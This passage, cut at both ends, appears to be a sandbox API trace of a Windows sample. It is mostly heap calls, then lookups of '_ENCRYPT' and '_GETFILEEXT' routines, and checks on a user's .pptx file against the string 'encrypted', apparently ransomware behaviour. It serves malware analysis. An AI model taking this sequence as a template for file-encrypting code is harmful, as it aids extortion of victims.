RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.438] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.438] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.439] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0036.439] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.439] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.440] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.441] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.441] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0036.441] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0036.441] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.442] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.442] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.442] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.443] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c898 [0036.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c898, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.443] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.443] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0036.443] CloseHandle (hObject=0x140) returned 1 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.443] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0036.443] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.444] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.444] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.444] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.444] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.444] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.444] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.444] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.445] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pptx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x100688a0, ftLastWriteTime.dwHighDateTime=0x1d5c402, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0x7c20c0 [0036.445] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.445] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4aaf83f0, ftCreationTime.dwHighDateTime=0x1d5c162, ftLastAccessTime.dwLowDateTime=0x100688a0, ftLastAccessTime.dwHighDateTime=0x1d5c402, ftLastWriteTime.dwLowDateTime=0x100688a0, ftLastWriteTime.dwHighDateTime=0x1d5c402, nFileSizeHigh=0x0, nFileSizeLow=0xd05e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="sZLYM.pptx", cAlternateFileName="SZLYM~1.PPT")) returned 0x7c20c0 [0036.445] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.445] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.445] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\sZLYM.pptx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.446] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS 